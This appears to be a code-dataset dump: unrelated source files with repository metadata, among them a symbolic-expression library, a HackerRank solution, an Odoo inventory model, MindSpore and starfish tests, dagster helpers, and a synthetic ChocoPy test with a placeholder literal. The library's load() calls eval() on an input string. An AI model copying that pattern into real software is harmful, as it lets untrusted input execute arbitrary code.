return LambdaClause(args)
λ=LambdaDefiner()
class Ref:
def __init__(self, r, uid):
self.refmaker = r
self.uid = uid
def __matmul__(self, rhs):
if self in self.refmaker.rees:
raise RuntimeError
self.refmaker.rees[self]=rhs
return rhs
def __repr__(self):
return f'{self.uid}@R'
class RefMaker:
def __init__(self):
self.refs = dict() # uid->ref
self.rees = dict() # ref->referee
def __rmatmul__(self, uid):
"Handles uid@self"
if uid not in self.refs:
self.refs[uid] = Ref(self,uid)
return self.refs[uid]
def save(x):
seen=set()
many=set()
def mr(x):
if id(x) in seen:
many.add(id(x))
else:
seen.add(id(x))
if isinstance(x, Base):
for a in x.args:
mr(a)
mr(x)
uids=dict() # ref id->ids
uid=1
def pr(x):
nonlocal uid
s=''
if id(x) in many:
if id(x) in uids:
return f'{uids[id(x)]}@R'
else:
uids[id(x)]=uid
s+=f'{uid}@R@'
uid+=1
if isinstance(x, Base):
first=True
s+=f'{type(x).__name__}('
for arg in x.args:
if first: first=False
else: s+=','
s+=pr(arg)
s+=')'
else:
s+=repr(x)
return s
return pr(x)
def load(s):
global R
R=RefMaker()
b=eval(s)
seen=set()
def resolve(x):
if id(x) not in seen:
seen.add(id(x))
if isinstance(x, Base):
x.args=[resolve(a) for a in x.args]
if isinstance(x, Ref):
return R.rees[x]
else:
return x
resolve(b)
return b
# >>> from sym import *
# >>> X=var.X
# >>> print(v.Y)
# E('var', 'Y')
# >>> a=[1,2]
# >>> a[0]=3
# >>> a[0]+=3
# >>> E('a','var')[3]
# E('[]', E('a', 'var'), 3)
# >>> a=v.a
# >>> a[0]
# E('[]', E('var', 'a'), 0)
# >>> v.X<v.Y
# E('<', E('var', 'X'), E('var', 'Y'))
# >>> v.X[v.X+1,]
# E('[]', E('var', 'X'), (E('+', E('var', 'X'), 1),))
# >>>
# >>> globals()['ai']=12
# >>> ai
# 12
# >>>
# >>> on(X)[3:4]
# E('?:', E('var', 'X'), 3, 4)
# >>> on(X)[3]
# E('?', E('var', 'X'), 3)
# >>> E(E('X','var'),'?',3)
# E(E('X', 'var'), '?', 3)
# >>> var.A
# E('var', 'A')
# >>> A
# Traceback (most recent call last):
# File "<console>", line 1, in <module>
# NameError: name 'A' is not defined
# >>> var=Env(globals())
# >>> var.A
# E('var', 'A')
# >>> A
# E('var', 'A')
# >>> E
# <class 'sym.E'>
# >>>
# >>> [getattr(var,x) for x in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ']
# [E('var', 'A'), E('var', 'B'), E('var', 'C'), E('var', 'D'), E('var', 'E'), E('var', 'F'), E('var', 'G'), E('var', 'H'), E('var', 'I'), E('var', 'J'), E('var', 'K'), E('var', 'L'), E('var', 'M'), E('var', 'N'), E('var', 'O'), E('var', 'P'), E('var', 'Q'), E('var', 'R'), E('var', 'S'), E('var', 'T'), E('var', 'U'), E('var', 'V'), E('var', 'W'), E('var', 'X'), E('var', 'Y'), E('var', 'Z')]
# >>> A
# E('var', 'A')
# >>> E
# E('var', 'E')
# >>> import fun
# >>> fun.E
# <class 'parle.sym.E'>
# >>> var.E
# E('var', 'E')
# >>> fun.E
# <class 'parle.sym.E'>
# >>> λ(X)[X+1]
# E('λ', ((E('var', 'X'),),), E('+', E('var', 'X'), 1))
# >>>
# >>>
# >>> let(X)
# LetClause(E('var', 'X'))
# >>> let(X)[X+1]
# E('=', E('args', E('var', 'X')), E('+', E('var', 'X'), 1))
# >>> LET=Stmt('let')
# >>>
# >>> LET(X)
# Traceback (most recent call last):
# File "<console>", line 1, in <module>
# TypeError: 'Stmt' object is not callable
# >>> LET[X]
# E('let', E('var', 'X'))
# >>>
|
[
"davidlovemore@gmail.com"
] |
davidlovemore@gmail.com
|
b5208a1ac2fd56dab09c83af59823316ebe6b71a
|
3bd40415aabba9ba705e8e20387d3521a48004eb
|
/Interview Preparation Kit/Dictionaries and Hashmaps/Hash Tables: Ransom Note.py
|
ab86513fa9454ca63732fa9788b15f6984fdcd4d
|
[] |
no_license
|
Narendran36/HackerRank
|
7da6f4ffc8a21031d3776c82e8969ca79eca0b06
|
f58ce1cfaa383ed8aec8ec10467048f6f8465624
|
refs/heads/master
| 2022-12-04T04:25:19.062493
| 2020-08-19T19:13:24
| 2020-08-19T19:13:24
| 256,822,744
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 432
|
py
|
#!/bin/python3
from collections import Counter
# Complete the checkMagazine function below.
def checkMagazine(magazine, note):
if (Counter(note) - Counter(magazine)) == {}:
print("Yes")
else:
print("No")
if __name__ == '__main__':
mn = input().split()
m = int(mn[0])
n = int(mn[1])
magazine = input().rstrip().split()
note = input().rstrip().split()
checkMagazine(magazine, note)
|
[
"noreply@github.com"
] |
noreply@github.com
|
43fcc04dae20aad1bf6fb21779872c8b34188828
|
bf59fae2a9513c008bab786ea277ff88fe3b335c
|
/Nemisa_mvp/nemisa_app.py
|
43ac793ceefaf0125f2655be72ab8ed312a9f357
|
[] |
no_license
|
Simangele101/Nemisa_hack_2021
|
316320c493b67850da4ff2c9295ad51480d9c887
|
f56c3a51398090cc33008fde3314fdb130bd62b9
|
refs/heads/master
| 2023-04-22T19:53:30.902634
| 2021-04-16T16:20:20
| 2021-04-16T16:20:20
| 358,657,229
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
"""
Simple Streamlit webserver application for serving developed classification
models.
Author: Rogue byte Analytica.
Note:
---------------------------------------------------------------------
Plase follow the instructions provided within the README.md file
located within this directory for guidance on how to use this script
correctly.
---------------------------------------------------------------------
For further help with the Streamlit framework, see:
https://docs.streamlit.io/en/latest/
"""
#import Dependencies
import streamlit as st
import datetime
import pandas as pd
def main():
st.header('Hello Nemisa Hackathon')
st.write("<h3 align='center'>This is Rogue Byte Analytica</h3>",unsafe_allow_html=True)
if __name__ == '__main__':
main()
|
[
"68602378+Simangele101@users.noreply.github.com"
] |
68602378+Simangele101@users.noreply.github.com
|
7126110b6be5e67ec95d040579d17ce5b4278f11
|
0b51bc6c7a98d07880955a31e147c0c15b1e3151
|
/tonkho/models/stock_quant.py
|
da383abe5fd406bbfc64072e6fd0731db111501c
|
[] |
no_license
|
tu95ctv/duan_mi2
|
72e8bcbad73dfea1b57b69dbfd1c8d48ecebb975
|
f1728d99e27fcc18684d50f5719f3dcedcffd755
|
refs/heads/master
| 2020-04-28T21:30:25.017845
| 2019-07-07T13:25:43
| 2019-07-07T13:25:43
| 175,584,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,283
|
py
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.exceptions import UserError, ValidationError
from odoo.tools.translate import _
from odoo.tools.float_utils import float_compare
from odoo.addons.tutool.mytools import name_compute
from odoo.addons.tonkho.tonkho_tool import write_to_current_path
from odoo.addons.tutool.mytools import pn_replace
from lxml import etree
class Quant(models.Model):
""" Quants are the smallest unit of stock physical instances """
_inherit = "stock.quant"
pn = fields.Char(related='product_id.pn', store=True,string="Part number")
categ_id = fields.Many2one('product.category', related='product_id.categ_id',store=True,string=u'Nhóm')
thiet_bi_id = fields.Many2one('tonkho.thietbi',related='product_id.thiet_bi_id', string = u'Thiết bị',store=True)
brand_id = fields.Many2one('tonkho.brand',related='product_id.brand_id',string=u'Hãng sản xuất',store=True)
tracking = fields.Selection([
('serial', 'By Unique Serial Number'),
('none', 'No Tracking')], string=u"Có SN hay không", related='product_id.tracking',store=True)
stock_location_id_selection = fields.Selection('get_stock_for_selection_field_',store=False)
tinh_trang = fields.Selection([('tot',u'Tốt'),('hong',u'Hỏng')],default='tot',related='lot_id.tinh_trang',store=True,string=u'Tình trạng')
ghi_chu = fields.Text(string=u'Ghi chú',related='lot_id.ghi_chu')
stt = fields.Integer()
inventory_line_id = fields.Many2one('stock.inventory.line')
# ml_ids = fields.One2many('stock.move.line','lot_id',compute='ml_ids_',string=u'Các dòng điều chỉnh')
ml_ids = fields.Many2many('stock.move.line','stock_quant_stock_move_line_rel','quant_id','move_line_id',compute='ml_ids_',
string=u'Các dòng điều chỉnh')
# @api.depends('is_done_ml_filter','is_your_department_filter','id_show')
def ml_ids_(self):
for r in self:
# active_id = r.id_show
domain = [('lot_id','=',r.lot_id.id),('product_id','=',r.product_id.id),'|',('location_id','=',r.location_id.id),('location_dest_id','=',r.location_id.id)]# r.id = new object nên không được
# if r.is_done_ml_filter:
# domain.append(('state','=','done'))
# if r.is_your_department_filter:
# your_department_id = self.env.user.department_id.id
# # department_domain = ['|',('location_id.department_id','=',your_department_id),('location_dest_id.department_id','=',your_department_id)]
# domain.extend(department_domain)
r.ml_ids = self.env['stock.move.line'].search(domain,order='id desc')
# is_done_ml_filter = fields.Boolean(default= True,store=False, string=u'Chỉ lọc dòng hoàn thành')
# is_your_department_filter = fields.Boolean(default= True,store=False,string =u'Chỉ lọc kho đơn vị của bạn')
# id_show = fields.Integer(compute='id_show_')
# def id_show_(self):
# for r in self:
# r.id_show = r.id
@api.model
def create(self, values):
if 'update_inventory' in self._context:
values.update(self._context['update_inventory'])
res = super(Quant, self).create(values)
return res
def get_stock_for_selection_field_(self):
locs = self.env['stock.location'].search([('is_kho_cha','=',True)])
rs = list(map(lambda i:(i.name,i.name),locs))
return rs
# @api.constrains('lot_id')
# def check_product_id(self):
# not_allow_check_lot_id_in_different_location =self.env['ir.config_parameter'].sudo().get_param('tonkho.not_allow_check_lot_id_in_different_location' )
# if not_allow_check_lot_id_in_different_location ==False:
# if self.lot_id:
# rs = self.env['stock.quant'].search([('lot_id','=',self.lot_id.id),('quantity','>',0)])
# if len(rs)>1:
# raise UserError(u'Không được có quants nội bộ chung lot_id và quantity > 0 product:%s-sn: %s'%(self.product_id.name,self.lot_id.name))
@api.constrains('location_id','quantity')
def not_allow_negative_qty(self):
for r in self:
if not r.location_id.cho_phep_am:
if r.quantity < 0:
raise UserError ( u' Kho:%s, không cho phép tạo âm- sản phẩm:%s-Serial number:%s'%(r.location_id.name,r.product_id.name,r.lot_id.name))
# GHI ĐÈ CÁI XEM DỊCH CHUYỂN KHO, KHÔNG CẦN LỌC VỊ TRÍ KHO
def action_view_stock_moves(self):
self.ensure_one()
action = self.env.ref('stock.stock_move_line_action').read()[0]
action['domain'] = [
('product_id', '=', self.product_id.id),
# '|', ('location_id', '=', self.location_id.id),
# ('location_dest_id', '=', self.location_id.id),
('lot_id', '=', self.lot_id.id),
('package_id', '=', self.package_id.id)]
return action
def name_get(self):
res = []
for r in self:
adict=[
('product_id',{'pr':None,'func':lambda r: r.name + (' [PN:%s]'%r.pn if r.pn else '')}),
# ('product_id',{'pr':None}),
('lot_id',{'pr':None,'func':lambda r: r.name,'skip_if_False':False}),
('quantity',{'pr':None,'func':lambda val:'%s'%val,'skip_if_False':False}),
]
name = name_compute(r,adict,join_char = u' | ')
res.append((r.id,name))
return res
@api.model
def name_search(self, name, args=None, operator='ilike', limit=100):
args = args or []
context = self._context or {}
if context.get('kho_da_chon') !=None:
choosed_list = context.get('kho_da_chon') [0][2]
args +=[('id','not in',choosed_list)]
if name:
pn_replace_str = pn_replace(name)
else:
pn_replace_str = ''
recs = self.search(['|','|',('product_id', operator, name),('product_id.pn_replace', operator, pn_replace_str),('lot_id.name', operator, name)] + args, limit=limit)
return recs.name_get()
@api.model
def search(self, args, offset=0, limit=None, order=None, count=False):
context = self._context or {}
if context.get('kho_da_chon') !=None:
choosed_list = context.get('kho_da_chon') [0][2]
args +=[('id','not in',choosed_list)]
return super(Quant, self).search(args, offset, limit, order, count=count)
@api.constrains('quantity')
def check_quantity(self):
for quant in self:
if float_compare(quant.quantity, 1, precision_rounding=quant.product_uom_id.rounding) > 0 and quant.lot_id and quant.product_id.tracking == 'serial':
raise ValidationError(_('A serial number should only be linked to a single product. %s,%s,%s'%(quant.quantity,quant.product_id.name,quant.lot_id.name)))
@api.model
def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):
res = super(Quant, self).fields_view_get(
view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)
if view_type =='search':
# write_to_current_path(u'%s'%res['arch'])
# print ("res['arch']",res['arch'])
doc = etree.fromstring(res['arch'])
node = doc.xpath("//filter[@name='locationgroup']")[0]
node.addnext(etree.Element('separator', {}))
node.addnext(etree.Element('filter', {'string':'Lọc theo kho của trạm %s'%self.env.user.department_id.name,'name': 'loc_theo_tram_137', 'domain': "[('location_id.department_id','=',%s)]"%self.env.user.department_id.id}))
res['arch'] = etree.tostring(doc, encoding='unicode')
return res
|
[
"nguyenductu@gmail.com"
] |
nguyenductu@gmail.com
|
21f188524361b8fa84956085533990c2bc3dbde9
|
dcc25b784213b17015d2080a7623c772d474dc22
|
/reproduce/AlphaFold2-Chinese/tests/st/mindelec/networks/test_frequency_domain_maxwell/test_frequency_domain_maxwell.py
|
65c3d50f3c3832682e1414cb4e3413c5f6f49489
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
mindspore-ai/community
|
930c9d9fdbead852e3597d522a72fe5b66bfc005
|
c72ce898482419117550ad16d93b38298f4306a1
|
refs/heads/master
| 2023-07-19T19:43:20.785198
| 2023-07-17T06:51:22
| 2023-07-17T06:51:22
| 250,693,100
| 193
| 10
|
Apache-2.0
| 2022-10-29T10:01:40
| 2020-03-28T02:00:02
|
Python
|
UTF-8
|
Python
| false
| false
| 5,395
|
py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
train
"""
import os
import pytest
import numpy as np
import mindspore.nn as nn
import mindspore.ops as ops
from mindspore import context, ms_function
from mindspore.common import set_seed
from mindspore.train.callback import LossMonitor
from mindspore.train.loss_scale_manager import DynamicLossScaleManager
from mindelec.solver import Solver, Problem
from mindelec.geometry import Rectangle, create_config_from_edict
from mindelec.common import L2
from mindelec.data import Dataset
from mindelec.operators import SecondOrderGrad as Hessian
from mindelec.loss import Constraints
from src.config import rectangle_sampling_config, helmholtz_2d_config
from src.model import FFNN
from src.dataset import test_data_prepare
from src.callback import PredictCallback, TimeMonitor
set_seed(0)
np.random.seed(0)
print("pid:", os.getpid())
context.set_context(mode=context.GRAPH_MODE, save_graphs=False, device_target="Ascend")
# define problem
class Helmholtz2D(Problem):
"""2D Helmholtz equation"""
def __init__(self, domain_name, bc_name, net, wavenumber=2):
super(Helmholtz2D, self).__init__()
self.domain_name = domain_name
self.bc_name = bc_name
self.type = "Equation"
self.wave_number = wavenumber
self.grad_xx = Hessian(net, input_idx1=0, input_idx2=0, output_idx=0)
self.grad_yy = Hessian(net, input_idx1=1, input_idx2=1, output_idx=0)
self.reshape = ops.Reshape()
@ms_function
def governing_equation(self, *output, **kwargs):
"""governing equation"""
u = output[0]
x = kwargs[self.domain_name][:, 0]
y = kwargs[self.domain_name][:, 1]
x = self.reshape(x, (-1, 1))
y = self.reshape(y, (-1, 1))
u_xx = self.grad_xx(kwargs[self.domain_name])
u_yy = self.grad_yy(kwargs[self.domain_name])
return u_xx + u_yy + self.wave_number**2 * u
@ms_function
def boundary_condition(self, *output, **kwargs):
"""boundary condition"""
u = output[0]
x = kwargs[self.bc_name][:, 0]
y = kwargs[self.bc_name][:, 1]
x = self.reshape(x, (-1, 1))
y = self.reshape(y, (-1, 1))
test_label = ops.sin(self.wave_number * x)
return 100 * (u - test_label)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_frequency_domain_maxwell():
"""train process"""
net = FFNN(input_dim=2, output_dim=1, hidden_layer=64)
# define geometry
geom_name = "rectangle"
rect_space = Rectangle(geom_name,
coord_min=helmholtz_2d_config["coord_min"],
coord_max=helmholtz_2d_config["coord_max"],
sampling_config=create_config_from_edict(rectangle_sampling_config))
geom_dict = {rect_space: ["domain", "BC"]}
# create dataset for train and test
train_dataset = Dataset(geom_dict)
train_data = train_dataset.create_dataset(batch_size=helmholtz_2d_config.get("batch_size", 128),
shuffle=True, drop_remainder=False)
test_input, test_label = test_data_prepare(helmholtz_2d_config)
# define problem and constraints
train_prob_dict = {geom_name: Helmholtz2D(domain_name=geom_name + "_domain_points",
bc_name=geom_name + "_BC_points",
net=net,
wavenumber=helmholtz_2d_config.get("wavenumber", 2)),
}
train_constraints = Constraints(train_dataset, train_prob_dict)
# optimizer
optim = nn.Adam(net.trainable_params(), learning_rate=helmholtz_2d_config.get("lr", 1e-4))
# solver
solver = Solver(net,
optimizer=optim,
mode="PINNs",
train_constraints=train_constraints,
test_constraints=None,
amp_level="O2",
metrics={'l2': L2(), 'distance': nn.MAE()},
loss_scale_manager=DynamicLossScaleManager()
)
# train
time_cb = TimeMonitor()
loss_cb = PredictCallback(model=net, predict_interval=10, input_data=test_input, label=test_label)
solver.train(epoch=helmholtz_2d_config.get("epochs", 10),
train_dataset=train_data,
callbacks=[time_cb, LossMonitor(), loss_cb])
per_step_time = time_cb.get_step_time()
l2_error = loss_cb.get_l2_error()
print(f'l2 error: {l2_error:.10f}')
print(f'per step time: {per_step_time:.10f}')
assert l2_error <= 0.05
assert per_step_time <= 10.0
|
[
"deanyuton@gmail.com"
] |
deanyuton@gmail.com
|
f64233795111df760e19371a35a584413081cff7
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/class_def_attr-big-407.py
|
d189ce0fed43c4a777ecf1f02981982293253209
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
class A(object):
x:int = 1
class A2(object):
x:int = 1
x2:int = 1
class A3(object):
x:int = 1
x2:int = 1
x3:int = 1
class A4(object):
x:int = 1
x2:int = 1
x3:int = 1
x4:int = 1
class A5(object):
x:int = 1
x2:int = 1
x3:int = 1
x4:int = 1
x5:int = 1
class B(A):
def __init__(self: "B"):
pass
class B2(A):
def __init__(self: "B2"):
pass
class B3(A):
def __init__(self: "B3"):
pass
class B4(A):
def __init__(self: "B4"):
pass
class B5(A):
def __init__(self: "B5"):
pass
class C(B):
z:bool = True
class C2(B):
z:bool = True
z2:bool = True
class C3(B):
z:bool = True
z2:bool = True
z3:bool = True
class C4(B):
z:bool = True
z2:bool = True
z3:bool = True
z4:bool = True
class C5(B):
z:bool = True
z2:bool = True
z3:bool = True
z4:bool = True
z5:bool = True
a:A = None
a2:A = None
a3:A = $Literal
a4:A = None
a5:A = None
b:B = None
b2:B = None
b3:B = None
b4:B = None
b5:B = None
c:C = None
c2:C = None
c3:C = None
c4:C = None
c5:C = None
a = A()
a2 = A()
a3 = A()
a4 = A()
a5 = A()
b = B()
b2 = B()
b3 = B()
b4 = B()
b5 = B()
c = C()
c2 = C()
c3 = C()
c4 = C()
c5 = C()
a.x = 1
b.x = a.x
c.z = a.x == b.x
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
917682f58de05483c2d7dcd124010513ed4badc8
|
a1f53b731fd1e3eb1923fb39fcb01477aa45f5c0
|
/blogapp/form.py
|
fb40e9ed2e05b6ad0de2524ac88315822acdc8f1
|
[] |
no_license
|
arseni2/djangoblog
|
76922d4abd7550bfb8a9b0514eda727699e57e37
|
b3b8e1a30c4f2860719d62736571e6aa4d0258df
|
refs/heads/main
| 2023-03-23T07:27:43.091875
| 2021-03-20T22:41:16
| 2021-03-20T22:41:16
| 346,117,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 481
|
py
|
from django import forms
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from django.contrib.auth import get_user_model
CustomUser = get_user_model()
class CustomUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = CustomUser
fields = UserCreationForm.Meta.fields+('age','email')
class CustomUserChangeForm(UserChangeForm):
class Meta:
model = CustomUser
fields = UserChangeForm.Meta.fields
|
[
"arc-37@mail.ru"
] |
arc-37@mail.ru
|
0a7dc15098a11e2585324fc2d0969841cf17bb22
|
f77b2c4b5808c360e8644644b0b3dba401ed3682
|
/random_games/python_syntax.py
|
1c3841b39cc9283bd72db28c63247c12c7a8bb21
|
[] |
no_license
|
616049195/random_junks
|
6a29393b7fcdb9b8968ff252446380effd629216
|
c616a29b1a0025f3451870ed660e28b81126e97e
|
refs/heads/master
| 2021-01-16T21:00:47.286799
| 2013-11-23T23:42:22
| 2013-11-23T23:42:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,645
|
py
|
"""
Python syntax...
"""
# list comprehension
## syntax
new_list = [x for x in range(1,6)]
# => [1, 2, 3, 4, 5]
##
## examples
even_squares = [x**2 for x in range(1,11) if (x)%2 == 0]
##
# dictionary
my_dict = {
'name' : "Hyunchel",
'age' : 23,
'citizenship' : "Republic of Korea"
}
print my_dict.keys()
print my_dict.values()
for key in my_dict:
print key, my_dict[key]
#
# list slicing
## syntax
[start:end:stride]
same with range() syntax.
[inclusive: exclusive: inclusive]
# if you omit, you can default value [first:last:1]
# negative values change direction (reverse...)
##
l = [i ** 2 for i in range(1, 11)]
# Should be [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
print l[0:9:2]
## omitting
my_list = range(1, 11) # List of numbers 1 - 10
# Add your code below!
print my_list[::2]
##
## reverseing
my_list = range(1, 11)
# Add your code below!
backwards = my_list[::-1]
print backwards
##
# lambda
## syntax
# lambda variable: expression
##
squares = [x**2 for x in range(1, 11)]
print filter(lambda x: x >= 30 and x <= 70, squares)
#
## file i/o
#----__enter__() and __exit__() invocation "with" and "as" syntax
#syntax
with open("file", "mode") as variable:
# Read or write to the file
#
#### "variable" is created for good. it can be used after the statement. ###
#examples
with open("text.txt", "w") as textfile:
textfile.write("Success!")
#
#_---- File's memeber variable "closed" is set to True/False depending the file's open status
with open("text.txt", "r+") as my_file:
my_file.write("HONEY")
if not my_file.closed:
my_file.close()
print my_file.closed
#
##
|
[
"hyunchelkk@gmail.com"
] |
hyunchelkk@gmail.com
|
0a6cac0a18fbccdf78c9aa59c0e8286c8bfe542c
|
4bf45827230011d8417ff797fe97b946921abaa3
|
/starfish/core/intensity_table/test/test_synthetic_intensities.py
|
6f35cb355c0e13c9e0b699f06bd4270a550c3905
|
[
"MIT"
] |
permissive
|
kne42/starfish
|
713eb9666c29d89b6d0b25ee36b63761c15de336
|
78b348c9756f367221dcca725cfa5107e5520b33
|
refs/heads/master
| 2020-04-19T19:41:37.736938
| 2019-07-18T00:14:16
| 2019-07-18T00:14:16
| 168,395,751
| 0
| 0
|
MIT
| 2019-09-24T02:38:16
| 2019-01-30T18:45:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
"""
Tests for IntensityTable.synthetic_intensities method.
"""
import numpy as np
from starfish.core.codebook.test.factories import codebook_array_factory
from starfish.core.types import Axes, Features
from ..intensity_table import IntensityTable
def test_synthetic_intensity_generation():
"""
Create a 2-spot IntensityTable of pixel size (z=3, y=4, x=5) from a codebook with 3 channels
and 2 rounds.
Verify that the constructed Synthetic IntensityTable conforms to those dimensions, and given
a known random seed, that the output spots decode to match a target in the input Codebook
"""
# set seed to check that codebook is matched. This seed generates 2 instances of GENE_B
np.random.seed(2)
codebook = codebook_array_factory()
num_z, height, width = 3, 4, 5
intensities = IntensityTable.synthetic_intensities(
codebook,
num_z=num_z,
height=height,
width=width,
n_spots=2,
)
# sizes should match codebook
assert intensities.sizes[Axes.ROUND] == 2
assert intensities.sizes[Axes.CH] == 3
assert intensities.sizes[Features.AXIS] == 2
# attributes should be bounded by the specified size
assert np.all(intensities[Axes.ZPLANE.value] <= num_z)
assert np.all(intensities[Axes.Y.value] <= height)
assert np.all(intensities[Axes.X.value] <= width)
# both codes should match GENE_B
assert np.array_equal(
np.where(intensities.values),
[[0, 0, 1, 1], # two each in feature 0 & 1
[1, 2, 1, 2], # one each in channel 1 & 2
[1, 0, 1, 0]], # channel 1 matches round 1, channel 2 matches round zero
)
|
[
"noreply@github.com"
] |
noreply@github.com
|
f76e193dc89f82660d667f368bb4936852252bc2
|
29e8e04876b8cf03dd8755ad1d085a755d3f4061
|
/venv/bin/chardetect
|
f3f63f7830033730f7309d96f51b19c34c7b028a
|
[
"MIT"
] |
permissive
|
haideraltahan/CropMe
|
431d213f2163c08579415bf3fc7708366ccd2d78
|
75a111b9d3b2c50c6f2a9a36d21432053f02284d
|
refs/heads/master
| 2020-05-30T07:37:18.713374
| 2019-05-31T20:15:19
| 2019-05-31T20:15:19
| 189,601,563
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
#!/home/haider/Desktop/CropMe/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"haideraltahan@gmail.com"
] |
haideraltahan@gmail.com
|
|
674a79a4698a5728e4c44718119f31a8b7728fc8
|
11595170c7b0d51505dabb3e330df875a95093c5
|
/RPCHitAnalyzer/WorkDir/getFileName.py
|
1349eb408ec0595606e17aceead6bf65a29a5488
|
[] |
no_license
|
ggrenier/CMSusercode
|
61d7e7ee25f7a0a68f48011d8ad798e85ea8a8a8
|
a90320daf8be5d1c2b448256b3e3fb0d907eb051
|
refs/heads/master
| 2021-01-10T11:23:20.668795
| 2016-03-11T13:46:34
| 2016-03-11T13:46:34
| 53,138,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
#special entries for the dictionnary passed by :
#'directory' is the directory where to put file, if not found, it is set to '../Data/'
#'startName' is the file startName, if not found, this is set to 'SingleMu_upscope'
#'extension' is the file extension, if not found, this is set to '.root'
def generateFileName(paramsBydict):
filename='../Data/'
if ('directory' in paramsBydict):
filename=paramsBydict['directory']
if ('startName' in paramsBydict):
filename=filename+paramsBydict['startName']
else:
filename=filename+'SingleMu_upscope'
sortedKeys=sorted(paramsBydict)
for x in sortedKeys:
if (x not in ['directory','startName','nevents','extension']):
filename=filename+'_'+x+str(paramsBydict[x])
if ('nevents' in paramsBydict):
filename=filename+'_'+str(paramsBydict['nevents'])
if ('extension' in paramsBydict):
filename=filename+str(paramsBydict['extension'])
else:
filename=filename+'.root'
return filename
if __name__ == "__main__":
a=dict()
a['Pt']=60
a['zvtx']=30
a['etamin']=2.3
a['nevents']=1000
print generateFileName(a)
|
[
"grenier@ipnl.in2p3.fr"
] |
grenier@ipnl.in2p3.fr
|
c74d3d817ada2bcf2794d7cffebfb2b3ccbf0e02
|
23a3c76882589d302b614da5f4be0fc626b4f3cd
|
/python_modules/dagster/dagster/api/snapshot_trigger.py
|
d9414b7c2318bcc7dc7ca624569ba3ba47f8ef8b
|
[
"Apache-2.0"
] |
permissive
|
DavidKatz-il/dagster
|
3641d04d387cdbe5535ae4f9726ce7dc1981a8c3
|
7c6d16eb8b3610a21020ecb479101db622d1535f
|
refs/heads/master
| 2022-12-20T13:08:36.462058
| 2020-09-14T18:12:12
| 2020-09-14T22:43:26
| 264,703,873
| 0
| 0
|
Apache-2.0
| 2020-06-16T09:49:00
| 2020-05-17T15:56:57
|
Python
|
UTF-8
|
Python
| false
| false
| 2,276
|
py
|
from dagster import check
from dagster.core.host_representation.external_data import (
ExternalExecutionParamsData,
ExternalExecutionParamsErrorData,
)
from dagster.core.host_representation.handle import RepositoryHandle
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.grpc.types import ExternalTriggeredExecutionArgs
from .utils import execute_unary_api_cli_command
def sync_get_external_trigger_execution_params(instance, repository_handle, trigger_name):
check.inst_param(repository_handle, "repository_handle", RepositoryHandle)
check.str_param(trigger_name, "trigger_name")
origin = repository_handle.get_origin()
return check.inst(
execute_unary_api_cli_command(
origin.executable_path,
"trigger_execution_params",
ExternalTriggeredExecutionArgs(
repository_origin=origin,
instance_ref=instance.get_ref(),
trigger_name=trigger_name,
),
),
(ExternalExecutionParamsData, ExternalExecutionParamsErrorData),
)
def sync_get_external_trigger_execution_params_ephemeral_grpc(
instance, repository_handle, trigger_name
):
from dagster.grpc.client import ephemeral_grpc_api_client
origin = repository_handle.get_origin()
with ephemeral_grpc_api_client(
LoadableTargetOrigin(executable_path=origin.executable_path)
) as api_client:
return sync_get_external_trigger_execution_params_grpc(
api_client, instance, repository_handle, trigger_name
)
def sync_get_external_trigger_execution_params_grpc(
api_client, instance, repository_handle, trigger_name
):
check.inst_param(repository_handle, "repository_handle", RepositoryHandle)
check.str_param(trigger_name, "trigger_name")
origin = repository_handle.get_origin()
return check.inst(
api_client.external_trigger_execution_params(
external_triggered_execution_args=ExternalTriggeredExecutionArgs(
repository_origin=origin,
instance_ref=instance.get_ref(),
trigger_name=trigger_name,
)
),
(ExternalExecutionParamsData, ExternalExecutionParamsErrorData),
)
|
[
"prha@elementl.com"
] |
prha@elementl.com
|
8b5bdf81def59b8f6930c4ce22ec1874049a0005
|
8d91f8867fb5b72ca257d9e7152188914154ccd1
|
/pune/controllers/admin/user.py
|
4c97fbd2cff00fce7bec04ce0a205ce7b77a0945
|
[] |
no_license
|
liwushuo/pune
|
c6420e9a3f65711cc7a6c578720122e5b7f53eb9
